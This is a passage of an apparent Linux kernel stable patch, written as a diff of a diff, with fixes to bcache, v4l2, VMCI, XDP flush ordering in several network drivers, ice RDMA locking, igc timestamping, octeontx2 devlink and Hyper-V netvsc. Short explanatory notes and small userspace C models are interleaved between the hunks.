+ static inline void bkey_copy_key(struct bkey *dest, const struct bkey *src)
+ {
+diff --git a/drivers/md/bcache/journal.c b/drivers/md/bcache/journal.c
+index e5da469a42357..c182c21de2e81 100644
+--- a/drivers/md/bcache/journal.c
++++ b/drivers/md/bcache/journal.c
+@@ -149,7 +149,8 @@ add:
+ 				    bytes, GFP_KERNEL);
+ 			if (!i)
+ 				return -ENOMEM;
+-			memcpy(&i->j, j, bytes);
++			unsafe_memcpy(&i->j, j, bytes,
++				/* "bytes" was calculated by set_bytes() above */);
+ 			/* Add to the location after 'where' points to */
+ 			list_add(&i->list, where);
+ 			ret = 1;
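Both bcache hunks annotate copies whose length is computed from a header rather than from sizeof(): with a trailing flexible array, FORTIFY_SOURCE sees a copy larger than the destination struct and warns, so unsafe_memcpy() keeps the copy and records the justification inline. A simplified userspace reproduction, with the struct layout invented:

/* Why a fortified memcpy dislikes flexible-array copies. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

struct bkey_like {
	uint64_t header;	/* encodes the number of trailing u64s */
	uint64_t ptr[];		/* flexible array: size known at runtime */
};

int main(void)
{
	uint64_t src_storage[3] = { 2 /* u64s */, 0xabc, 0xdef };
	uint64_t dst_storage[3];
	struct bkey_like *src = (struct bkey_like *)src_storage;
	struct bkey_like *dst = (struct bkey_like *)dst_storage;
	size_t bytes = sizeof(uint64_t) * (1 + src->header); /* bkey_bytes() */

	/* A fortified memcpy sees sizeof(*dst) == 8 and would flag this
	 * perfectly valid 24-byte copy; the kernel annotates it instead. */
	memcpy(dst, src, bytes);
	printf("copied %zu bytes, ptr[1]=0x%llx\n", bytes,
	       (unsigned long long)dst->ptr[1]);
	return 0;
}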
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-api.c b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+index 3d3b6dc24ca63..002ea6588edf1 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-api.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+@@ -150,8 +150,8 @@ static int user_to_new(struct v4l2_ext_control *c, struct v4l2_ctrl *ctrl)
+ 			 * then return an error.
+ 			 */
+ 			if (strlen(ctrl->p_new.p_char) == ctrl->maximum && last)
+-			ctrl->is_new = 1;
+ 				return -ERANGE;
++			ctrl->is_new = 1;
+ 		}
+ 		return ret;
+ 	default:
+diff --git a/drivers/misc/vmw_vmci/vmci_queue_pair.c b/drivers/misc/vmw_vmci/vmci_queue_pair.c
+index 844264e1b88cc..73d71c4ec1399 100644
+--- a/drivers/misc/vmw_vmci/vmci_queue_pair.c
++++ b/drivers/misc/vmw_vmci/vmci_queue_pair.c
+@@ -3044,7 +3044,7 @@ ssize_t vmci_qpair_enqueue(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&from, WRITE, &v, 1, buf_size);
++	iov_iter_kvec(&from, ITER_SOURCE, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+@@ -3088,7 +3088,7 @@ ssize_t vmci_qpair_dequeue(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&to, READ, &v, 1, buf_size);
++	iov_iter_kvec(&to, ITER_DEST, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+@@ -3133,7 +3133,7 @@ ssize_t vmci_qpair_peek(struct vmci_qp *qpair,
+ 	if (!qpair || !buf)
+ 		return VMCI_ERROR_INVALID_ARGS;
+ 
+-	iov_iter_kvec(&to, READ, &v, 1, buf_size);
++	iov_iter_kvec(&to, ITER_DEST, &v, 1, buf_size);
+ 
+ 	qp_lock(qpair);
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
+index 3585f02575dfb..57eeb066a9456 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ethtool.c
+@@ -48,6 +48,7 @@ mcp251xfd_ring_set_ringparam(struct net_device *ndev,
+ 	priv->rx_obj_num = layout.cur_rx;
+ 	priv->rx_obj_num_coalesce_irq = layout.rx_coalesce;
+ 	priv->tx->obj_num = layout.cur_tx;
++	priv->tx_obj_num_coalesce_irq = layout.tx_coalesce;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+index fc68a32ce2f71..d8fb7d4ebd51e 100644
+--- a/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
++++ b/drivers/net/ethernet/freescale/dpaa/dpaa_eth.c
+@@ -2400,6 +2400,9 @@ static int dpaa_eth_poll(struct napi_struct *napi, int budget)
+ 
+ 	cleaned = qman_p_poll_dqrr(np->p, budget);
+ 
++	if (np->xdp_act & XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	if (cleaned < budget) {
+ 		napi_complete_done(napi, cleaned);
+ 		qman_p_irqsource_add(np->p, QM_PIRQ_DQRI);
+@@ -2407,9 +2410,6 @@ static int dpaa_eth_poll(struct napi_struct *napi, int budget)
+ 		qman_p_irqsource_add(np->p, QM_PIRQ_DQRI);
+ 	}
+ 
+-	if (np->xdp_act & XDP_REDIRECT)
+-		xdp_do_flush();
+-
+ 	return cleaned;
+ }
+ 
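This dpaa fix, and the dpaa2 and qede ones below, all enforce the same ordering rule: xdp_do_flush() must run before napi_complete_done(), because after completion the poller may not run again until the next interrupt, stranding any still-buffered XDP_REDIRECT frames. A toy simulation of the rule; no real networking is involved:

/* Ordering sketch: flush buffered work before signalling completion. */
#include <stdio.h>

static int pending_redirects;

static void xdp_do_flush(void) { pending_redirects = 0; }

static void napi_complete_done(void)
{
	/* After this point the poller may not run again until the next
	 * IRQ, so nothing may be left buffered. */
	if (pending_redirects)
		printf("BUG: %d frames stranded past completion\n",
		       pending_redirects);
	else
		printf("clean completion\n");
}

int main(void)
{
	pending_redirects = 3;	/* frames queued by XDP_REDIRECT */
	xdp_do_flush();		/* fixed order: flush first */
	napi_complete_done();
	return 0;
}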
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index 8d029addddad0..6383d9805dac9 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -1868,10 +1868,15 @@ static int dpaa2_eth_poll(struct napi_struct *napi, int budget)
+ 		if (rx_cleaned >= budget ||
+ 		    txconf_cleaned >= DPAA2_ETH_TXCONF_PER_NAPI) {
+ 			work_done = budget;
++			if (ch->xdp.res & XDP_REDIRECT)
++				xdp_do_flush();
+ 			goto out;
+ 		}
+ 	} while (store_cleaned);
+ 
++	if (ch->xdp.res & XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	/* Update NET DIM with the values for this CDAN */
+ 	dpaa2_io_update_net_dim(ch->dpio, ch->stats.frames_per_cdan,
+ 				ch->stats.bytes_per_cdan);
+@@ -1902,9 +1907,7 @@ out:
+ 		txc_fq->dq_bytes = 0;
+ 	}
+ 
+-	if (ch->xdp.res & XDP_REDIRECT)
+-		xdp_do_flush_map();
+-	else if (rx_cleaned && ch->xdp.res & XDP_TX)
++	if (rx_cleaned && ch->xdp.res & XDP_TX)
+ 		dpaa2_eth_xdp_tx_flush(priv, ch, &priv->fq[flowid]);
+ 
+ 	return work_done;
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index 001500afc4a6e..e04871379baad 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -856,7 +856,7 @@ void ice_set_ethtool_repr_ops(struct net_device *netdev);
+ void ice_set_ethtool_safe_mode_ops(struct net_device *netdev);
+ u16 ice_get_avail_txq_count(struct ice_pf *pf);
+ u16 ice_get_avail_rxq_count(struct ice_pf *pf);
+-int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx);
++int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx, bool locked);
+ void ice_update_vsi_stats(struct ice_vsi *vsi);
+ void ice_update_pf_stats(struct ice_pf *pf);
+ void
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb_lib.c b/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
+index add90e75f05c5..9aa0437aa598e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb_lib.c
+@@ -434,7 +434,7 @@ int ice_pf_dcb_cfg(struct ice_pf *pf, struct ice_dcbx_cfg *new_cfg, bool locked)
+ 		goto out;
+ 	}
+ 
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, false);
+ 
+ out:
+ 	/* enable previously downed VSIs */
+@@ -724,12 +724,13 @@ static int ice_dcb_noncontig_cfg(struct ice_pf *pf)
+ /**
+  * ice_pf_dcb_recfg - Reconfigure all VEBs and VSIs
+  * @pf: pointer to the PF struct
++ * @locked: is adev device lock held
+  *
+  * Assumed caller has already disabled all VSIs before
+  * calling this function. Reconfiguring DCB based on
+  * local_dcbx_cfg.
+  */
+-void ice_pf_dcb_recfg(struct ice_pf *pf)
++void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked)
+ {
+ 	struct ice_dcbx_cfg *dcbcfg = &pf->hw.port_info->qos_cfg.local_dcbx_cfg;
+ 	struct iidc_event *event;
+@@ -776,14 +777,16 @@ void ice_pf_dcb_recfg(struct ice_pf *pf)
+ 		if (vsi->type == ICE_VSI_PF)
+ 			ice_dcbnl_set_all(vsi);
+ 	}
+-	/* Notify the AUX drivers that TC change is finished */
+-	event = kzalloc(sizeof(*event), GFP_KERNEL);
+-	if (!event)
+-		return;
++	if (!locked) {
++		/* Notify the AUX drivers that TC change is finished */
++		event = kzalloc(sizeof(*event), GFP_KERNEL);
++		if (!event)
++			return;
+ 
+-	set_bit(IIDC_EVENT_AFTER_TC_CHANGE, event->type);
+-	ice_send_event_to_aux(pf, event);
+-	kfree(event);
++		set_bit(IIDC_EVENT_AFTER_TC_CHANGE, event->type);
++		ice_send_event_to_aux(pf, event);
++		kfree(event);
++	}
+ }
+ 
+ /**
+@@ -1034,7 +1037,7 @@ ice_dcb_process_lldp_set_mib_change(struct ice_pf *pf,
+ 	}
+ 
+ 	/* changes in configuration update VSI */
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, false);
+ 
+ 	/* enable previously downed VSIs */
+ 	ice_dcb_ena_dis_vsi(pf, true, true);
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb_lib.h b/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
+index 4c421c842a13f..800879a88c5e7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_dcb_lib.h
+@@ -23,7 +23,7 @@ u8 ice_dcb_get_tc(struct ice_vsi *vsi, int queue_index);
+ int
+ ice_pf_dcb_cfg(struct ice_pf *pf, struct ice_dcbx_cfg *new_cfg, bool locked);
+ int ice_dcb_bwchk(struct ice_pf *pf, struct ice_dcbx_cfg *dcbcfg);
+-void ice_pf_dcb_recfg(struct ice_pf *pf);
++void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked);
+ void ice_vsi_cfg_dcb_rings(struct ice_vsi *vsi);
+ int ice_init_pf_dcb(struct ice_pf *pf, bool locked);
+ void ice_update_dcb_stats(struct ice_pf *pf);
+@@ -128,7 +128,7 @@ static inline u8 ice_get_pfc_mode(struct ice_pf *pf)
+ 	return 0;
+ }
+ 
+-static inline void ice_pf_dcb_recfg(struct ice_pf *pf) { }
++static inline void ice_pf_dcb_recfg(struct ice_pf *pf, bool locked) { }
+ static inline void ice_vsi_cfg_dcb_rings(struct ice_vsi *vsi) { }
+ static inline void ice_update_dcb_stats(struct ice_pf *pf) { }
+ static inline void
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index b7be84bbe72d6..e1f6373a3a2c0 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -3472,7 +3472,9 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 	struct ice_vsi *vsi = np->vsi;
+ 	struct ice_pf *pf = vsi->back;
+ 	int new_rx = 0, new_tx = 0;
++	bool locked = false;
+ 	u32 curr_combined;
++	int ret = 0;
+ 
+ 	/* do not support changing channels in Safe Mode */
+ 	if (ice_is_safe_mode(pf)) {
+@@ -3536,15 +3538,33 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 		return -EINVAL;
+ 	}
+ 
+-	ice_vsi_recfg_qs(vsi, new_rx, new_tx);
++	if (pf->adev) {
++		mutex_lock(&pf->adev_mutex);
++		device_lock(&pf->adev->dev);
++		locked = true;
++		if (pf->adev->dev.driver) {
++			netdev_err(dev, "Cannot change channels when RDMA is active\n");
++			ret = -EBUSY;
++			goto adev_unlock;
++		}
++	}
++
++	ice_vsi_recfg_qs(vsi, new_rx, new_tx, locked);
+ 
+-	if (!netif_is_rxfh_configured(dev))
+-		return ice_vsi_set_dflt_rss_lut(vsi, new_rx);
++	if (!netif_is_rxfh_configured(dev)) {
++		ret = ice_vsi_set_dflt_rss_lut(vsi, new_rx);
++		goto adev_unlock;
++	}
+ 
+ 	/* Update rss_size due to change in Rx queues */
+ 	vsi->rss_size = ice_get_valid_rss_size(&pf->hw, new_rx);
+ 
+-	return 0;
++adev_unlock:
++	if (locked) {
++		device_unlock(&pf->adev->dev);
++		mutex_unlock(&pf->adev_mutex);
++	}
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index ca2898467dcb5..1ac5f0018c7eb 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -4192,12 +4192,13 @@ bool ice_is_wol_supported(struct ice_hw *hw)
+  * @vsi: VSI being changed
+  * @new_rx: new number of Rx queues
+  * @new_tx: new number of Tx queues
++ * @locked: is adev device_lock held
+  *
+  * Only change the number of queues if new_tx, or new_rx is non-0.
+  *
+  * Returns 0 on success.
+  */
+-int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx)
++int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx, bool locked)
+ {
+ 	struct ice_pf *pf = vsi->back;
+ 	int err = 0, timeout = 50;
+@@ -4226,7 +4227,7 @@ int ice_vsi_recfg_qs(struct ice_vsi *vsi, int new_rx, int new_tx)
+ 
+ 	ice_vsi_close(vsi);
+ 	ice_vsi_rebuild(vsi, false);
+-	ice_pf_dcb_recfg(pf);
++	ice_pf_dcb_recfg(pf, locked);
+ 	ice_vsi_open(vsi);
+ done:
+ 	clear_bit(ICE_CFG_BUSY, pf->state);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index c34734d432e0d..4e10ced736dbb 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -417,10 +417,12 @@ static int igc_ptp_verify_pin(struct ptp_clock_info *ptp, unsigned int pin,
+  *
+  * We need to convert the system time value stored in the RX/TXSTMP registers
+  * into a hwtstamp which can be used by the upper level timestamping functions.
++ *
++ * Returns 0 on success.
+  **/
+-static void igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
+-				       struct skb_shared_hwtstamps *hwtstamps,
+-				       u64 systim)
++static int igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
++				      struct skb_shared_hwtstamps *hwtstamps,
++				      u64 systim)
+ {
+ 	switch (adapter->hw.mac.type) {
+ 	case igc_i225:
+@@ -430,8 +432,9 @@ static void igc_ptp_systim_to_hwtstamp(struct igc_adapter *adapter,
+ 						systim & 0xFFFFFFFF);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
++	return 0;
+ }
+ 
+ /**
+@@ -652,7 +655,8 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ 
+ 	regval = rd32(IGC_TXSTMPL);
+ 	regval |= (u64)rd32(IGC_TXSTMPH) << 32;
+-	igc_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval);
++	if (igc_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval))
++		return;
+ 
+ 	switch (adapter->link_speed) {
+ 	case SPEED_10:
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index 88dee589cb217..dc7bd2ce78f7d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -1500,6 +1500,9 @@ static const struct devlink_param rvu_af_dl_params[] = {
+ 			     BIT(DEVLINK_PARAM_CMODE_RUNTIME),
+ 			     rvu_af_dl_dwrr_mtu_get, rvu_af_dl_dwrr_mtu_set,
+ 			     rvu_af_dl_dwrr_mtu_validate),
++};
++
++static const struct devlink_param rvu_af_dl_param_exact_match[] = {
+ 	DEVLINK_PARAM_DRIVER(RVU_AF_DEVLINK_PARAM_ID_NPC_EXACT_FEATURE_DISABLE,
+ 			     "npc_exact_feature_disable", DEVLINK_PARAM_TYPE_STRING,
+ 			     BIT(DEVLINK_PARAM_CMODE_RUNTIME),
+@@ -1563,7 +1566,6 @@ int rvu_register_dl(struct rvu *rvu)
+ {
+ 	struct rvu_devlink *rvu_dl;
+ 	struct devlink *dl;
+-	size_t size;
+ 	int err;
+ 
+ 	dl = devlink_alloc(&rvu_devlink_ops, sizeof(struct rvu_devlink),
+@@ -1585,21 +1587,32 @@ int rvu_register_dl(struct rvu *rvu)
+ 		goto err_dl_health;
+ 	}
+ 
++	err = devlink_params_register(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++	if (err) {
++		dev_err(rvu->dev,
++			"devlink params register failed with error %d", err);
++		goto err_dl_health;
++	}
++
+ 	/* Register exact match devlink only for CN10K-B */
+-	size = ARRAY_SIZE(rvu_af_dl_params);
+ 	if (!rvu_npc_exact_has_match_table(rvu))
+-		size -= 1;
++		goto done;
+ 
+-	err = devlink_params_register(dl, rvu_af_dl_params, size);
++	err = devlink_params_register(dl, rvu_af_dl_param_exact_match,
++				      ARRAY_SIZE(rvu_af_dl_param_exact_match));
+ 	if (err) {
+ 		dev_err(rvu->dev,
+-			"devlink params register failed with error %d", err);
+-		goto err_dl_health;
++			"devlink exact match params register failed with error %d", err);
++		goto err_dl_exact_match;
+ 	}
+ 
++done:
+ 	devlink_register(dl);
+ 	return 0;
+ 
++err_dl_exact_match:
++	devlink_params_unregister(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++
+ err_dl_health:
+ 	rvu_health_reporters_destroy(rvu);
+ 	devlink_free(dl);
+@@ -1612,8 +1625,14 @@ void rvu_unregister_dl(struct rvu *rvu)
+ 	struct devlink *dl = rvu_dl->dl;
+ 
+ 	devlink_unregister(dl);
+-	devlink_params_unregister(dl, rvu_af_dl_params,
+-				  ARRAY_SIZE(rvu_af_dl_params));
++
++	devlink_params_unregister(dl, rvu_af_dl_params, ARRAY_SIZE(rvu_af_dl_params));
++
++	/* Unregister exact match devlink only for CN10K-B */
++	if (rvu_npc_exact_has_match_table(rvu))
++		devlink_params_unregister(dl, rvu_af_dl_param_exact_match,
++					  ARRAY_SIZE(rvu_af_dl_param_exact_match));
++
+ 	rvu_health_reporters_destroy(rvu);
+ 	devlink_free(dl);
+ }
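
Splitting the single devlink parameter array in two is what lets the always-present parameters register unconditionally while the exact-match parameter registers only when the hardware has the table, with each set unregistered symmetrically. A compilable userspace model of conditional two-array registration with unwind (all names invented; the real code uses devlink_params_register()/devlink_params_unregister()):

#include <stdbool.h>
#include <stdio.h>

static int register_params(const char **p, int n)
{
	for (int i = 0; i < n; i++)
		printf("registered %s\n", p[i]);
	return 0;
}

static void unregister_params(const char **p, int n)
{
	for (int i = n - 1; i >= 0; i--)
		printf("unregistered %s\n", p[i]);
}

static const char *base_params[]  = { "dwrr_mtu" };
static const char *exact_params[] = { "npc_exact_feature_disable" };

static int register_all(bool has_exact_match_table)
{
	int err = register_params(base_params, 1);

	if (err)
		return err;
	if (!has_exact_match_table)
		return 0;		/* the base set alone is valid */

	err = register_params(exact_params, 1);
	if (err)
		unregister_params(base_params, 1);	/* symmetric unwind */
	return err;
}

int main(void)
{
	return register_all(true);
}
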
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_fp.c b/drivers/net/ethernet/qlogic/qede/qede_fp.c
+index 7c2af482192d7..cb1746bc0e0c5 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_fp.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_fp.c
+@@ -1438,6 +1438,10 @@ int qede_poll(struct napi_struct *napi, int budget)
+ 	rx_work_done = (likely(fp->type & QEDE_FASTPATH_RX) &&
+ 			qede_has_rx_work(fp->rxq)) ?
+ 			qede_rx_int(fp, budget) : 0;
++
++	if (fp->xdp_xmit & QEDE_XDP_REDIRECT)
++		xdp_do_flush();
++
+ 	/* Handle case where we are called by netpoll with a budget of 0 */
+ 	if (rx_work_done < budget || !budget) {
+ 		if (!qede_poll_is_more_work(fp)) {
+@@ -1457,9 +1461,6 @@ int qede_poll(struct napi_struct *napi, int budget)
+ 		qede_update_tx_producer(fp->xdp_tx);
+ 	}
+ 
+-	if (fp->xdp_xmit & QEDE_XDP_REDIRECT)
+-		xdp_do_flush_map();
+-
+ 	return rx_work_done;
+ }
+ 
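The qede reordering reflects a general XDP rule: frames queued by XDP_REDIRECT must be flushed before the poll function completes NAPI, because after completion the context may not run again until the next interrupt; the older xdp_do_flush_map() name is replaced by xdp_do_flush() at the same time. The virtio_net hunk further below applies the same reordering. A standalone model of the required ordering (the functions here are stand-ins for xdp_do_flush() and napi_complete_done()):

#include <stdbool.h>
#include <stdio.h>

static int receive_packets(int budget)	{ return budget - 1; }
static void xdp_flush(void)		{ puts("flush redirected frames"); }
static void napi_complete(void)		{ puts("re-arm interrupts"); }

static int napi_poll(int budget, bool did_redirect)
{
	int done = receive_packets(budget);

	/* Flush BEFORE completing: once interrupts are re-armed this
	 * context may not run again soon, stranding queued frames. */
	if (did_redirect)
		xdp_flush();

	if (done < budget)
		napi_complete();

	return done;
}

int main(void)
{
	return napi_poll(64, true) < 0;
}
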
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 0556542d7a6b6..3a86f1213a051 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1003,8 +1003,11 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	/* Determine netdevice features */
+ 	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+ 			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM))
++	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+ 		net_dev->features |= NETIF_F_TSO6;
++		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
++			net_dev->hw_enc_features |= NETIF_F_TSO6;
++	}
+ 	/* Check whether device supports TSO */
+ 	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+ 		net_dev->features &= ~NETIF_F_ALL_TSO;
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 9352dad58996d..e02d1e3ef672a 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -987,9 +987,6 @@ static void netvsc_copy_to_send_buf(struct netvsc_device *net_device,
+ void netvsc_dma_unmap(struct hv_device *hv_dev,
+ 		      struct hv_netvsc_packet *packet)
+ {
+-	u32 page_count = packet->cp_partial ?
+-		packet->page_buf_cnt - packet->rmsg_pgcnt :
+-		packet->page_buf_cnt;
+ 	int i;
+ 
+ 	if (!hv_is_isolation_supported())
+@@ -998,7 +995,7 @@ void netvsc_dma_unmap(struct hv_device *hv_dev,
+ 	if (!packet->dma_range)
+ 		return;
+ 
+-	for (i = 0; i < page_count; i++)
++	for (i = 0; i < packet->page_buf_cnt; i++)
+ 		dma_unmap_single(&hv_dev->device, packet->dma_range[i].dma,
+ 				 packet->dma_range[i].mapping_size,
+ 				 DMA_TO_DEVICE);
+@@ -1028,9 +1025,7 @@ static int netvsc_dma_map(struct hv_device *hv_dev,
+ 			  struct hv_netvsc_packet *packet,
+ 			  struct hv_page_buffer *pb)
+ {
+-	u32 page_count =  packet->cp_partial ?
+-		packet->page_buf_cnt - packet->rmsg_pgcnt :
+-		packet->page_buf_cnt;
++	u32 page_count = packet->page_buf_cnt;
+ 	dma_addr_t dma;
+ 	int i;
+ 
+diff --git a/drivers/net/phy/dp83822.c b/drivers/net/phy/dp83822.c
+index b60db8b6f4774..267e6fd3d4448 100644
+--- a/drivers/net/phy/dp83822.c
++++ b/drivers/net/phy/dp83822.c
+@@ -233,7 +233,8 @@ static int dp83822_config_intr(struct phy_device *phydev)
+ 				DP83822_ENERGY_DET_INT_EN |
+ 				DP83822_LINK_QUAL_INT_EN);
+ 
+-		if (!dp83822->fx_enabled)
++		/* Private data pointer is NULL on DP83825/26 */
++		if (!dp83822 || !dp83822->fx_enabled)
+ 			misr_status |= DP83822_ANEG_COMPLETE_INT_EN |
+ 				       DP83822_DUP_MODE_CHANGE_INT_EN |
+ 				       DP83822_SPEED_CHANGED_INT_EN;
+@@ -253,7 +254,8 @@ static int dp83822_config_intr(struct phy_device *phydev)
+ 				DP83822_PAGE_RX_INT_EN |
+ 				DP83822_EEE_ERROR_CHANGE_INT_EN);
+ 
+-		if (!dp83822->fx_enabled)
++		/* Private data pointer is NULL on DP83825/26 */
++		if (!dp83822 || !dp83822->fx_enabled)
+ 			misr_status |= DP83822_ANEG_ERR_INT_EN |
+ 				       DP83822_WOL_PKT_INT_EN;
+ 
+diff --git a/drivers/net/phy/meson-gxl.c b/drivers/net/phy/meson-gxl.c
+index c49062ad72c6c..5e41658b1e2fa 100644
+--- a/drivers/net/phy/meson-gxl.c
++++ b/drivers/net/phy/meson-gxl.c
+@@ -271,6 +271,8 @@ static struct phy_driver meson_gxl_phy[] = {
+ 		.handle_interrupt = meson_gxl_handle_interrupt,
+ 		.suspend        = genphy_suspend,
+ 		.resume         = genphy_resume,
++		.read_mmd	= genphy_read_mmd_unsupported,
++		.write_mmd	= genphy_write_mmd_unsupported,
+ 	},
+ };
+ 
+diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
+index d4c821c8cf57c..1d71f5276241c 100644
+--- a/drivers/net/ppp/ppp_generic.c
++++ b/drivers/net/ppp/ppp_generic.c
+@@ -480,7 +480,7 @@ static ssize_t ppp_read(struct file *file, char __user *buf,
+ 	ret = -EFAULT;
+ 	iov.iov_base = buf;
+ 	iov.iov_len = count;
+-	iov_iter_init(&to, READ, &iov, 1, count);
++	iov_iter_init(&to, ITER_DEST, &iov, 1, count);
+ 	if (skb_copy_datagram_iter(skb, 0, &to, skb->len))
+ 		goto outf;
+ 	ret = skb->len;
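
This one-liner is an instance of a rename that recurs throughout this patch (nvme-tcp, nvmet, zcore, sg, the iscsi target, target_core_file, usbip, vhost): the iov_iter direction argument switches from the overloaded READ/WRITE constants to ITER_DEST (data is copied into the iterator) and ITER_SOURCE (data is copied out of it). A small standalone sketch of the convention (the enum and helper are a userspace model, not the kernel API):

#include <stdio.h>
#include <string.h>

enum iter_dir { DIR_DEST, DIR_SOURCE };

struct iter {
	enum iter_dir dir;
	char *buf;
	size_t len;
};

/* Copy into an iterator: only legal when it was set up as a DEST. */
static size_t copy_to_iter_model(struct iter *it, const void *src, size_t n)
{
	if (it->dir != DIR_DEST || n > it->len)
		return 0;
	memcpy(it->buf, src, n);
	return n;
}

int main(void)
{
	char buf[16];
	/* A read()-style path fills caller memory, so its iter is a DEST;
	 * a write()/send path would be declared a SOURCE instead. */
	struct iter it = { DIR_DEST, buf, sizeof(buf) };

	printf("copied %zu bytes\n", copy_to_iter_model(&it, "hello", 6));
	return 0;
}
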
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 3cd15f16090f1..20b1b34a092ad 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1673,13 +1673,13 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 
+ 	received = virtnet_receive(rq, budget, &xdp_xmit);
+ 
++	if (xdp_xmit & VIRTIO_XDP_REDIR)
++		xdp_do_flush();
++
+ 	/* Out of packets? */
+ 	if (received < budget)
+ 		virtqueue_napi_complete(napi, rq->vq, received);
+ 
+-	if (xdp_xmit & VIRTIO_XDP_REDIR)
+-		xdp_do_flush();
+-
+ 	if (xdp_xmit & VIRTIO_XDP_TX) {
+ 		sq = virtnet_xdp_get_sq(vi);
+ 		if (virtqueue_kick_prepare(sq->vq) && virtqueue_notify(sq->vq)) {
